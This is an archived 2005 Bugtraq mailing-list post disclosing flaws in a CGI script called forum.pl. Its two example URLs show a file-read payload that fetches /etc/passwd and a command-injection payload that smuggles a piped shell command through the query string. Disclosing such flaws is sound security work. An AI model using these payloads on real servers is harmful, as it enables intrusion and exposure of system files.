[38580] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

remote command execution in forum.pl script

daemon@ATHENA.MIT.EDU (fireboy fireboy)
Mon Apr 25 16:21:53 2005

Date: 24 Apr 2005 21:09:50 -0000
Message-ID: <20050424210950.29763.qmail@www.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: fireboy fireboy <fireboynet@webmails.com>
To: bugtraq@securityfocus.com



Tunis 24/04/2005
BUG found by fireboy
fireboy@webmails.com



THERE ARE SOME BUGS IN 	forum.pl SCRIPT THAT CAN SHOW SENSILBLES FILES IN A SYSTEM 
OR EXECUTE COMMANDS IN THE TARGET HOST WICH CAN COMPROMISE IT.

IT IS ONLY FOR SECURITY AND EDUCATIONAL PURPOSE 


1)file showing
http://www.target.com/cgi-bin/forum.pl?/etc/passwd

2)remote code execution
http://www.target.com/cgi-bin/forum.pl?|command


greetz to all magattack memebers www.magattack.tk


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[38580] in bugtraq

remote command execution in forum.pl script

daemon@ATHENA.MIT.EDU (fireboy fireboy)Mon Apr 25 16:21:53 2005

daemon@ATHENA.MIT.EDU (fireboy fireboy)
Mon Apr 25 16:21:53 2005